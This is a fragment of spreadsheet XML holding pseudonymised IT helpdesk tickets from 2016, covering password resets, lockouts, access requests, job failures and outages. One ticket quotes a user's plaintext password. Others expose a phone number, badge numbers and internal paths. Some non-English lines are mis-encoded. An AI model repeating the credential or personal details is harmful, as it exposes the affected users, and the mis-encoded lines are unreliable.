    <t>ieæµè§ˆå™¨æ‰“å¼€crmç³»ç»ŸåŽæç¤ºç”¨æˆ·å·²è¢«æ³¨é”€ï¼Œæ— æ³•ç™»å½•crmç³»ç»Ÿã€‚</t>
  </si>
  <si>
    <t>cjnlsbkq ocxnrewb</t>
  </si>
  <si>
    <t>access to s drive.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wnvlmsjr.znbvlygd@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
kindly request to give access to s drive._x000D_
_x000D_
s:\globalengservices\_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wnvlmsjr znbvlygd</t>
  </si>
  <si>
    <t>kindly add user id : trhsydsff to erp business analytics team in ticketing_tool tool</t>
  </si>
  <si>
    <t>vthuzanc fqdgotvx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/25/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/25/2016 01:36:00</t>
  </si>
  <si>
    <t>desktop item missing when save attachment .</t>
  </si>
  <si>
    <t>zmkitbsh bxsyaipz</t>
  </si>
  <si>
    <t>HostName_1030 is currently experiencing high cpu utilization. please investigate!</t>
  </si>
  <si>
    <t>bozdftwx smylqejw</t>
  </si>
  <si>
    <t>mass - upload programdnty changes to condition table a520 in crm</t>
  </si>
  <si>
    <t xml:space="preserve">mass - upload programdnty changes to condition table a520 in crm_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 12:25 am et on 10/25.</t>
  </si>
  <si>
    <t>GRP_39</t>
  </si>
  <si>
    <t>xtsuifdz.wktgzcyl@gmail.com is blocked now as the user said</t>
  </si>
  <si>
    <t>dbwkxalj cnhgysju</t>
  </si>
  <si>
    <t>access to //HostName_95/departments/backorderreports</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: avurmegj.pxgmjynu@gmail.com
please give full access to user trhadg45 for folder mentioned in the subject.
</t>
  </si>
  <si>
    <t>avurmegj pxgmjynu</t>
  </si>
  <si>
    <t>the user's account is blocked now (xtsuifdz.wktgzcyl@gmail.com)</t>
  </si>
  <si>
    <t>name:dbwkxalj cnhgysju
language:
browser:microsoft internet explorer
email:dbwkxalj.cnhgysju@gmail.com
customer number:
summary:the user's account is blocked now (xtsuifdz.wktgzcyl@gmail.com)</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1330 failed in job_scheduler at: 10/25/2016 00:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1330 failed in job_scheduler at: 10/25/2016 00:12:00</t>
  </si>
  <si>
    <t>zeitdaten fÃ¼r germany steel fehlen</t>
  </si>
  <si>
    <t>seit gestern ca. 15.00 uhr fehlen alle zeitdaten. daten werden dringend fÃ¼r die tÃ¤glichen auswertungen (leistungsgrad u.s.w.) benÃ¶tigt</t>
  </si>
  <si>
    <t>yjofqlrx aqvxfhmn</t>
  </si>
  <si>
    <t>network outage:poncacity -germany-dmvpn router is down since 11:23 am et on 10/24.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____________11:23 am et on 10/24._________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _______yes__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</si>
  <si>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:i am unable to open the collaboration_platform link shared by my europe counterpart.</t>
  </si>
  <si>
    <t>name:theajdlkadyt hrtgsd
language:
browser:microsoft internet explorer
email:lqipwdeg.dkbmjnvl@gmail.com
customer number:
summary:i am unable to open the collaboration_platform link shared by my europe counterpart.
\\eagl8111432\users\schetrhsdlw\collaboration_platform - company inc-\k12526634</t>
  </si>
  <si>
    <t>lqipwdeg dkbmjnvl</t>
  </si>
  <si>
    <t xml:space="preserve"> can not reach to password_management_tool password manager to change my password</t>
  </si>
  <si>
    <t>name:mitgckqf ewourgcx
language:
browser:microsoft internet explorer
email:mitgckqf.ewourgcx@gmail.com
customer number:
summary:i can not reach to password_management_tool password manager to change my password</t>
  </si>
  <si>
    <t>mitgckqf ewourgcx</t>
  </si>
  <si>
    <t>: k-bngell-cgdaytshqsd &lt;k-bngell-cgdaytshqsd@company.onmicrosoft.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lvxakohq.tsfnhowj@gmail.com
hello ,
pl add my name in to this team.
also i need administrative control of this since i have heading this team after ndthwedwys rao left company.
with kind </t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39filesys failed in job_scheduler at: 10/24/2016 21:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39filesys failed in job_scheduler at: 10/24/2016 21:53:00</t>
  </si>
  <si>
    <t>msd - office 2013 outlook æ‰“ä¸å¼€ï¼Œæ˜¾ç¤ºæ— æ³•åˆ›å»ºæ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢</t>
  </si>
  <si>
    <t xml:space="preserve">please provide details of the issue.
[â€Ž2016/â€Ž10/â€Ž25 9:36] melhduty gqchtedl: 
hi 
æˆ‘çš„ç”µè„‘é‚®ç®±æ‰“ä¸å¼€äº†
ä½ å¯ä»¥å¸®æˆ‘å—ï¼Ÿ
è°¢è°¢
[â€Ž2016/â€Ž10/â€Ž25 9:38] melhduty gqchtedl: 
æ˜¾ç¤ºç³»ç»Ÿé”™è¯¯
æ˜¾ç¤ºæ— æ³•åˆ›å»ºæ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢
[â€Ž2016/â€Ž10/â€Ž25 9:40] obuwfnkm ufpwmybi: 
æŠŠä½ æ¡Œé¢å…±äº«ç»™æˆ‘
[â€Ž2016/â€Ž10/â€Ž25 9:41] melhduty gqchtedl: 
id 
</t>
  </si>
  <si>
    <t>melhduty gqchtedl</t>
  </si>
  <si>
    <t xml:space="preserve">çœ‹ä¸è§a3 çš„æ–‡ä»¶å¤¹ï¼ˆ\\HostName_17\teams\business\ a3 ï¼‰ï¼Œè¯·å¸®å¿™å¼„ä¸€ä¸‹ã€‚sahtym wanthryg </t>
  </si>
  <si>
    <t>hlrmufzx qcdzierm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_568 failed in job_scheduler at: 10/24/2016 20:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_568 failed in job_scheduler at: 10/24/2016 20:38:00</t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and unlocked the account._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>liksfpeq pwjbsryc</t>
  </si>
  <si>
    <t xml:space="preserve"> october cyber security month - ransomware</t>
  </si>
  <si>
    <t>pyrtfdxu nxfkqmoy</t>
  </si>
  <si>
    <t xml:space="preserve">ms outlook  stopped updating (cant receive or send e-mails since fr.10/21/16) </t>
  </si>
  <si>
    <t>please check lfal8512946.  looks like bothms office 2010&amp; 2016 installed? ii have an access database that won't work with 2016. 7:30am-4pm pacific 775-432-6109</t>
  </si>
  <si>
    <t>ugrnzjpy utbswegc</t>
  </si>
  <si>
    <t>logon balancing error on erp SID_34</t>
  </si>
  <si>
    <t>logon balancing error on erp SID_34
user brandtrhee pjdhfitman called on behalf of user</t>
  </si>
  <si>
    <t>xtqbjieu uablitwr</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_738 failed in job_scheduler at: 10/24/2016 17:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_738 failed in job_scheduler at: 10/24/2016 17:32:00</t>
  </si>
  <si>
    <t>windows account locked</t>
  </si>
  <si>
    <t>wetajgsq ezmcqkbp</t>
  </si>
  <si>
    <t>backup on company provided mobile phone</t>
  </si>
  <si>
    <t>purchasingupstreamsso and ad for qpixeudn rjlziysd</t>
  </si>
  <si>
    <t xml:space="preserve">please create an purchasingupstreamsso and ad for qpixeudn rjlziysd (bachsdadgtadw).  the samaccountname in ad is to be all lowercase. </t>
  </si>
  <si>
    <t>xszoedmc gmhkdsnw</t>
  </si>
  <si>
    <t>badges for msc training</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gdkiehbr.kdithjsr@gmail.com
please activate the badge numbers below for the msc training.
they need to be active from monday october 31st at 7:00 am cst to thursday november 3rd at 5:00 pm cst
54654657
54651789
54653756
</t>
  </si>
  <si>
    <t>gdkiehbr kdithjsr</t>
  </si>
  <si>
    <t>cannot get into crm</t>
  </si>
  <si>
    <t>missing the sales &amp; markhtyeting tab from the enterprise portal which gives access to crm, so i don't have access to crm</t>
  </si>
  <si>
    <t>gtfdvnry nxsaqrfh</t>
  </si>
  <si>
    <t>please provide access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tbvpkjoh.wnxzhqoa@gmail.com
i need access to the following path.  please see pmgzjikq potmrkxy for approval.
tbvpkjoh wnxzhqoa
company usa plant controller
tbvpkjoh.wnxzhqoa@gmail.com&lt;mailto:tbvpkjoh.wnxzhqoa@gmail.com&gt;
</t>
  </si>
  <si>
    <t>tbvpkjoh wnxzhqoa</t>
  </si>
  <si>
    <t>ticket update on inplant_872683</t>
  </si>
  <si>
    <t>unable to login to collaboration_platform // password reset</t>
  </si>
  <si>
    <t>rvqnjgas kcmybldh</t>
  </si>
  <si>
    <t xml:space="preserve">all my calls to my ip phone are going to warehouse_toolmail, it is not even ringing. </t>
  </si>
  <si>
    <t>damuphws arkulcoi</t>
  </si>
  <si>
    <t xml:space="preserve">sales area selection on opportunities not filtering to those in which the account is extended. instead it shows all. </t>
  </si>
  <si>
    <t>sales area selection on opportunities not filtering to those in which the account is extended. see attached email communication including example for account # 81877788768.</t>
  </si>
  <si>
    <t>GRP_40</t>
  </si>
  <si>
    <t>pc not detecting docking station</t>
  </si>
  <si>
    <t>dglwxfzu sgbnpvql</t>
  </si>
  <si>
    <t>having trouble connecting to companysecure</t>
  </si>
  <si>
    <t xml:space="preserve">jeftryhf is having trouble connecting to companysecure at remote sites and usa. </t>
  </si>
  <si>
    <t>hdetqcpj ehsjitcy</t>
  </si>
  <si>
    <t xml:space="preserve">i cannot log into erp. </t>
  </si>
  <si>
    <t xml:space="preserve"> i tried rebooting the computer and i tried logging into another computer and i get a blank screen.</t>
  </si>
  <si>
    <t>GRP_41</t>
  </si>
  <si>
    <t>trxpwfag fakubynv</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for szrglyte.stvyhzxn@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: monday, october 24, 2016 6:07 pm
to: nwfodmhc exurcwkm
cc: 
subject: shadakjsdd request to reset microsoft online services password for szrglyte.stvyhzxn@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ szrglyte.stvyhzxn@gmail.com 
â€¢ first name: twejhda 
â€¢ last name: asjadjs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</si>
  <si>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szrglyte stvyhzxn</t>
  </si>
  <si>
    <t>usa file server, HostName_1326, has failed hard drive</t>
  </si>
  <si>
    <t>xweclugf qmhbjsyi</t>
  </si>
  <si>
    <t>unable to display the expense report</t>
  </si>
  <si>
    <t>sghamujc shompueb</t>
  </si>
  <si>
    <t>unlock account the user aeftjxos lhnyofad - id: vvsardkajdjtf</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,
could you please unlock account the user aeftjxos lhnyofad - id: vvsardkajdjtf. case this account was expired, please extend the access for the account, the manager this user is zuyimtsf qjtimdsp - please contact majsdtnrio.
or, if you have more doubts please return me ..
</t>
  </si>
  <si>
    <t>qasdhyzm yuglsrwx</t>
  </si>
  <si>
    <t>unable to login to outlook</t>
  </si>
  <si>
    <t xml:space="preserve">from: rjsulvat uanigkqc 
sent: monday, october 24, 2016 7:36 pm
to: nwfodmhc exurcwkm
subject: thadasgg fwd: problem with outlook
it is again
Ð¾Ñ‚Ð¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¾ Ñ iphone
Ð½Ð°Ñ‡Ð°Ð»Ð¾ Ð¿ÐµÑ€ÐµÐ°Ð´Ñ€ÐµÑÐ¾Ð²Ð°Ð½Ð½Ð¾Ð³Ð¾ ÑÐ¾Ð¾Ð±Ñ‰ÐµÐ½Ð¸Ñ:
Ð¾Ñ‚: "rjsulvat uanigkqc" &lt;rjsulvat.uanigkqc@gmail.com&gt;
ÐºÐ¾Ð¼Ñƒ: "nwfodmhc exurcwkm" &lt;nwfodmhc.exurcwkm@gmail.com&gt;
Ñ‚ÐµÐ¼Ð°: problem with outlook
hello.
i cannot start outlook
Ð¾Ñ‚Ð¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¾ Ñ iphone
</t>
  </si>
  <si>
    <t>logon balancing error in erp</t>
  </si>
  <si>
    <t>ywlbctfr yvkhcwip</t>
  </si>
  <si>
    <t>kailyenh zfyvkopr</t>
  </si>
  <si>
    <t>the username ccghksdm787 will be used to login to company via citrix</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
the username ccghksdm787 will be used to login to company via citrix
i assume that we need to delete this user profile on the citrix servers so please send a ticket to the citrix team because his account in active directory is not locked
oinqckds qieswrfu
manager 
oinqckds.qieswrfu@gmail.com
gesendet: dienstag, 18. oktober 2016 16:40
an: oinqckds qieswrfu
betreff: password
hi ,
can you please reset my  account so i can login again.
my user is : ccghksdm787
my last password was: pr03bsddqd99
it doesnt work so i cant login at the moment.
</t>
  </si>
  <si>
    <t>oinqckds qieswrfu</t>
  </si>
  <si>
    <t>prtgghj4k access locked</t>
  </si>
  <si>
    <t xml:space="preserve">jgdydqqd locked me out.  i tried going onto password_management_tool to reset my password but jgdydqqd isn't listed.  can you please unlock my account aerp?  </t>
  </si>
  <si>
    <t>horeduca ogrhivnm</t>
  </si>
  <si>
    <t>unable to connect to the home internet</t>
  </si>
  <si>
    <t>internet connection does not appear to be working - wireless</t>
  </si>
  <si>
    <t>ctepaurs igrazhwo</t>
  </si>
  <si>
    <t>unable to sign in reporting_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vmeljsfb.ymxejsbd@gmail.com_x000D_
_x000D_
hello, i am unable to sign into reporting_tool. can someone please assist me with my correct user name and password? i have never signed into it before._x000D_
</t>
  </si>
  <si>
    <t>vmeljsfb ymxejsbd</t>
  </si>
  <si>
    <t>vitalyst transfer:  crm calendar not showing on outlook</t>
  </si>
  <si>
    <t>unable to access erp through my vpn connection</t>
  </si>
  <si>
    <t>working from home, started vpn, cannot access erp.  keep getting logon balancing error 88.  suggest submitting to it team at usa.</t>
  </si>
  <si>
    <t>mobile device activation.</t>
  </si>
  <si>
    <t xml:space="preserve">hello colleagues,
would you please be so kind and activate the new iphone of hybegvwo dbgrtqhs (company\kstdaddaad )
details, please see mail below.
many </t>
  </si>
  <si>
    <t>hybegvwo dbgrtqhs</t>
  </si>
  <si>
    <t xml:space="preserve">a kÃ¼ndigung for eluvxqhw gpbfkqeu, 11166428, effective 28.02.2017 has been approved. </t>
  </si>
  <si>
    <t xml:space="preserve">hello , _x000D_
_x000D_
a kÃ¼ndigung for eluvxqhw gpbfkqeu, 11166428, effective 28.02.2017 has been approved. _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>trgqbeax hfyzudql</t>
  </si>
  <si>
    <t>password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm 
sent: monday, october 24, 2016 9:49 pm
to: uzpycdho hdswinlo; ustvaifg hmzfewks
subject: uzpycdho hdswinlo, your windows password is expiring soon!!
hi ,
unfortunately it is an automatic process. we cannot extend the time period. 
once you come back from vacation please give us a call back. we will reset the password for you.
</t>
  </si>
  <si>
    <t>uzpycdho hdswinlo</t>
  </si>
  <si>
    <t>phksfqxe wkbovsmu</t>
  </si>
  <si>
    <t>erp SID_34 password reset.</t>
  </si>
  <si>
    <t>krynlisw dqfeglkc</t>
  </si>
  <si>
    <t xml:space="preserve">erp </t>
  </si>
  <si>
    <t>name:fievgddtrr
language:
browser:microsoft internet explorer
email:hpelnwco.byjgvdzf@gmail.com
customer number:
telephone:
summary: erp bloqued
too many failes attempts.
tanks</t>
  </si>
  <si>
    <t>hpelnwco byjgvdzf</t>
  </si>
  <si>
    <t>skype online meeting freezing</t>
  </si>
  <si>
    <t>unable to join a skype meeting._x000D_
skype keeps freezing.</t>
  </si>
  <si>
    <t>smhepfdn aypgzieh</t>
  </si>
  <si>
    <t>unable to connect to company center // sales org not working</t>
  </si>
  <si>
    <t>blank call</t>
  </si>
  <si>
    <t>ayrhcfxi zartupsw</t>
  </si>
  <si>
    <t>unable to connect to global_telecom_1 broadband</t>
  </si>
  <si>
    <t>name:joetrhud
language:
browser:microsoft internet explorer
email:eziswfym.cehwzojy@gmail.com
customer number:
telephone:
summary:unable to connect to internet using  broadband service.</t>
  </si>
  <si>
    <t>eziswfym cehwzojy</t>
  </si>
  <si>
    <t>password has expired</t>
  </si>
  <si>
    <t>garthyhtuy was out of office for a long time, and needs assistance with logging back in to the pc now.
he is in office at the moment.</t>
  </si>
  <si>
    <t>bqrwfkun tsdzmplq</t>
  </si>
  <si>
    <t>summary:attendance_tool password forgot.</t>
  </si>
  <si>
    <t>name:kirathrydan
language:
browser:microsoft internet explorer
email:jchlkard.tcaiyjfg@gmail.com
customer number:
telephone:
summary:attendance_tool password forgot</t>
  </si>
  <si>
    <t>erp zqt pntp and zntc price not calculating on quote 2005151099</t>
  </si>
  <si>
    <t xml:space="preserve">erp quote pntp net price and zntc unit price are $0.00 but all costs are loaded. see screenshots in email attached. need quote to send to customer for ordering
</t>
  </si>
  <si>
    <t>zsulhnxd gexdzoqy</t>
  </si>
  <si>
    <t>could not use bobjee application: search and explorer analytics / erp netweaver portal</t>
  </si>
  <si>
    <t>error message: it was not possible to retrieve the facets and their values._x000D_
can't start exploring the information space as it doesn't contain any data.</t>
  </si>
  <si>
    <t>gaiopkun bvcdpxrt</t>
  </si>
  <si>
    <t>us time change</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xabkyoug.wdkyiqfx@gmail.com
hi team,
below is the hub posting to be published for us time change aerp. revert if you have any questions.
planned service disruption
what is the event? (daylight savings time ends in u.s.)
when does it begin? (6:00 pm edt saturday, 5th-november-2016)
when does it end?  (following time change, 2:00 am est sunday, 06-november-2016)
who and what will be affected? (all erp users, all erp systems including erp, plm, bw, crm, supply_chain, hcm)
what is the reason?  (all erp systems must be stopped during time change to prevent data inconsistency.)
questions?
(corporate datacenter â€“)
(xabkyoug wdkyiqfx, nvyjtmca xjhpznds &amp; network operations)
best </t>
  </si>
  <si>
    <t>xabkyoug wdkyiqfx</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1020-idb-daily failed in job_scheduler at: 10/24/2016 10:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1020-idb-daily failed in job_scheduler at: 10/24/2016 10:13:00</t>
  </si>
  <si>
    <t>2 in 1 has cracked screen, but turned off touch screen. so no longer jumps curser around.</t>
  </si>
  <si>
    <t>2 in 1 has cracked screen, but turned off touch screen. so no longer jumps curser around.
phone:
pc name: lmsl8300803trys</t>
  </si>
  <si>
    <t>jkelxorm uwqjlzfm</t>
  </si>
  <si>
    <t>password reset for uacyltoe hxgayczemii8</t>
  </si>
  <si>
    <t>name:dctvfjrn oypnxftq
language:
browser:microsoft internet explorer
email:dctvfjrn.oypnxftq@gmail.com
customer number:
telephone:
summary:reset the password for aolhgbps pbxqtcek uacyltoe hxgayczemii8</t>
  </si>
  <si>
    <t>dctvfjrn oypnxftq</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to skype </t>
  </si>
  <si>
    <t>laptop issues</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lwizucan.zvnxlobq@gmail.com
hallo,
my outlook collapsed two times. i tried to restart my laptop, but it doesn't startup anymore.  restarting is on my screen for already half an hour.
[image1.jpg]
met vriendelijke groet,
lwizucan zvnxlobq
directeur company 
lwizucan.zvnxlobq@gmail.com&lt;mailto:lwizucan.zvnxlobq@gmail.com&gt;
</t>
  </si>
  <si>
    <t>lwizucan zvnxlobq</t>
  </si>
  <si>
    <t>receiving collaboration_platform deletion emails in not in english</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gvxfymjk.euioadyf@gmail.com
why are these coming in spanish?
i have already told lothryra what they mean, but they should be in english.
please enter a ticket for collaboration.
</t>
  </si>
  <si>
    <t>gvxfymjk euioadyf</t>
  </si>
  <si>
    <t>jmxrabzy dpyvjcxr</t>
  </si>
  <si>
    <t xml:space="preserve">ip address conflict </t>
  </si>
  <si>
    <t>carthygyrol is back in the office after few weeks off, she saw an ip address conflict message.
requested to restart and she did not see the message again.</t>
  </si>
  <si>
    <t>scan doesn't work in the home printer</t>
  </si>
  <si>
    <t>lukibasy bqufyozk</t>
  </si>
  <si>
    <t>erp SID_34 account lock out.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account lock out._x000D_
</t>
  </si>
  <si>
    <t>rzglsoma qkjfwmnz</t>
  </si>
  <si>
    <t>skype meeting add-in getting disabled from outlook</t>
  </si>
  <si>
    <t>i canÂ´t connect my note book to the " vpn "</t>
  </si>
  <si>
    <t>i canÂ´t connect my note book to the vpn "  "_x000D_
page csn not be shown.</t>
  </si>
  <si>
    <t>hycqbvem oriablwt</t>
  </si>
  <si>
    <t>the password for "infosthryda" has expired. south amerirtca erp not working.</t>
  </si>
  <si>
    <t>today the erp is not working. while attempting to use the erp client, it shows a message (attached): "37000: microsoft odbc vmsliazh ltksxmyv driver. login failed for user "infosthryda". reason: the password of the account has expired".
we have contacted the vendor that said the password is expired due to settings configured by company dba team. dba team should unlock account, cahnge password and setup the erp with the new password.</t>
  </si>
  <si>
    <t>reset passwords for mgvpoyqd tnlshpwb using password_management_tool password reset.</t>
  </si>
  <si>
    <t>mgvpoyqd tnlshpwb</t>
  </si>
  <si>
    <t>speaker not working in skype</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: weupycai.epqhduro@gmail.com_x000D_
_x000D_
hello,_x000D_
i am facing the issue of no sound during skype meeting. kindly do needful._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>weupycai epqhduro</t>
  </si>
  <si>
    <t>problem of ticket_no1561937 which was fixed with chg1145039 has back</t>
  </si>
  <si>
    <t xml:space="preserve">regarding ticket_no1561937 which was fixed with chg1145039, key user reported in the attached email that the application is showing the problem again today._x000D_
we have contacted the vendor and they told us they will verify but have recommended to run the command again while they are investigating. also they have suggested us to involve the dba team to also verify. it seems the db is missing information._x000D_
</t>
  </si>
  <si>
    <t>ts04562 printer isn't printing</t>
  </si>
  <si>
    <t>name:gqhfieys pkwcdbrv
language:
browser:microsoft internet explorer
email:gqhfieys.pkwcdbrv@gmail.com
customer number:
telephone:
summary:ts04562 printer still not working after system restart</t>
  </si>
  <si>
    <t>gqhfieys pkwcdbrv</t>
  </si>
  <si>
    <t>probleme mit fixiereinheit we101 \qvncizuf ueiybanz</t>
  </si>
  <si>
    <t>qvncizuf ueiybanz</t>
  </si>
  <si>
    <t>efrjkspc sfhbunrp, your windows password is expiring soon!!</t>
  </si>
  <si>
    <t xml:space="preserve">from: efrjkspc sfhbunrp 
sent: monday, october 24, 2016 11:54 am
to: nwfodmhc exurcwkm
subject:  - aw: efrjkspc sfhbunrp, your windows password is expiring soon!!
importance: high
hello.
i have changed my password a few day days ago.
why get i this reminder?
please inform me if i have change again?
</t>
  </si>
  <si>
    <t>efrjkspc sfhbunrp</t>
  </si>
  <si>
    <t>aw: teams drive folder retention/deletion - please review and respond</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oxkhntpl.xwszgidt@gmail.com_x000D_
_x000D_
hello it support,_x000D_
_x000D_
could you please give mr. vxpcnrtw xelhoicd the permission to read and write, load and upload files from the global teams drive for the folder gm-sge-programdnty?_x000D_
many </t>
  </si>
  <si>
    <t>oxkhntpl xwszgidt</t>
  </si>
  <si>
    <t>usa ou deletion</t>
  </si>
  <si>
    <t>all groups, qlhmawgi sgwipoxns and ou's for usatdhdal can be deleted.  usatdhdal ou can also be deleted</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze</t>
  </si>
  <si>
    <t xml:space="preserve">name:tqnbkjgu xyedbsnm
language:
browser:microsoft internet explorer
email:tqnbkjgu.xyedbsnm@gmail.com
customer number:
telephone:
summary:uacyltoe hxgaycze 2
</t>
  </si>
  <si>
    <t>tqnbkjgu xyedbsnm</t>
  </si>
  <si>
    <t xml:space="preserve"> billing block not removed automatically</t>
  </si>
  <si>
    <t xml:space="preserve">hello it,_x000D_
_x000D_
please check, why billing block was not removed automatically._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jwqyxbzs adpvilqu</t>
  </si>
  <si>
    <t>need to create the delivery note for sto 5019202486, but it wonÂ´t work</t>
  </si>
  <si>
    <t>gokluswt qlvzreyb</t>
  </si>
  <si>
    <t>erp SID_34 erp production password reset</t>
  </si>
  <si>
    <t>name:chtrhysdrystal
language:
browser:microsoft internet explorer
email:oxkghdbr.dsyvalof@gmail.com
customer number:
telephone:
summary:good morning. can you please reset my erp password?</t>
  </si>
  <si>
    <t>oxkghdbr dsyvalof</t>
  </si>
  <si>
    <t>need to install ts02345 printer</t>
  </si>
  <si>
    <t>urgent - users in germany are reporting that they cannot reach gso using the chat feature</t>
  </si>
  <si>
    <t xml:space="preserve">tqnbkjgu xyedbsnm reported that he and his colleagues are unable to reach gso using the chat._x000D_
when they fill out the form, the next page comes up only with the company logo._x000D_
</t>
  </si>
  <si>
    <t>fdmaluyo tvecikxn</t>
  </si>
  <si>
    <t>new iphone activation /  die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis d</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ecwtrjnq.jpecxuty@gmail.com
hello colleagues,
would you please be so kind and activate the new iphone of hybegvwo dbgrtqhs (company\sdjdskjdkyr )
details, please see mail below.
many </t>
  </si>
  <si>
    <t>ecwtrjnq jpecxuty</t>
  </si>
  <si>
    <t xml:space="preserve">folder access : :\\HostName_753\departements\aese\thryad </t>
  </si>
  <si>
    <t>folder access : :\\HostName_753\departements\aese\thryad 
read &amp; write access needed</t>
  </si>
  <si>
    <t>veyduami hjxpwqbi</t>
  </si>
  <si>
    <t>in outlook and all other microsoft applications a message appears saying: product deactivated</t>
  </si>
  <si>
    <t xml:space="preserve">in outlook and all other microsoft applications a message appears saying: product deactivated_x000D_
</t>
  </si>
  <si>
    <t>yxdbznju gicjlbrk</t>
  </si>
  <si>
    <t>laptop bettery issue</t>
  </si>
  <si>
    <t xml:space="preserve">facing charging issue.
computer name : aidl89110765e6
service tag       : dcd1hz1hd.
</t>
  </si>
  <si>
    <t>zbmhdaru zhaupwno</t>
  </si>
  <si>
    <t>reset passwords for bfnvjgxd trqmnpvu using password_management_tool password reset.</t>
  </si>
  <si>
    <t>bfnvjgxd trqmnpvu</t>
  </si>
  <si>
    <t>druckerfunktionsstÃ¶rung</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fdqjsygx.aivdjqtr@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
der drucker â€žem96" scannt keine dokumente ein._x000D_
_x000D_
fehlermeldung: zugriff Ã¼berprÃ¼fen fÃ¼r folgende ziele fehlgeschlagen:_x000D_
_x000D_
                \\HostName_579\_kmscan\em96&lt;file:///\\HostName_579\_kmscan\em96&gt;: der pfad kann nicht gefunden werden._x000D_
_x000D_
der fehler lÃ¤sst sich auch durch mehrmaliges ein- und ausschalten nicht beheben._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>GRP_42</t>
  </si>
  <si>
    <t>fdqjsygx aivdjqtr</t>
  </si>
  <si>
    <t>erp- gesperrt fehlversuche kennwort gesperrt</t>
  </si>
  <si>
    <t>bitte erp freischalten fehlversuche</t>
  </si>
  <si>
    <t>tgpvrbyi ztdxwpcn</t>
  </si>
  <si>
    <t>password is not synchronized.</t>
  </si>
  <si>
    <t>airhfgen ynsjogui</t>
  </si>
  <si>
    <t>pc der maschine r45 defekt</t>
  </si>
  <si>
    <t>pc der maschine r45 fÃ¤hrt nicht mehr hoch.</t>
  </si>
  <si>
    <t>baygwijr lavxwkfc</t>
  </si>
  <si>
    <t>pc awywx00067004 in rddept qlhmawgi sgwipoxn is not getting network connection</t>
  </si>
  <si>
    <t>uaclgmeq hyxzmwdi</t>
  </si>
  <si>
    <t>call from salesforce for hathryrtmut</t>
  </si>
  <si>
    <t>caller named benjamtrhdyin from salesforce wanted to talk to hathryrtmut</t>
  </si>
  <si>
    <t>bug in employee extract programdnty - reportncqulao qauighdpnager is appearing blank.</t>
  </si>
  <si>
    <t>EU_tool in germany steel ohne funktion - rÃ¼ckmelden geht nicht!!!!</t>
  </si>
  <si>
    <t>rvdtagmf klbnhydo</t>
  </si>
  <si>
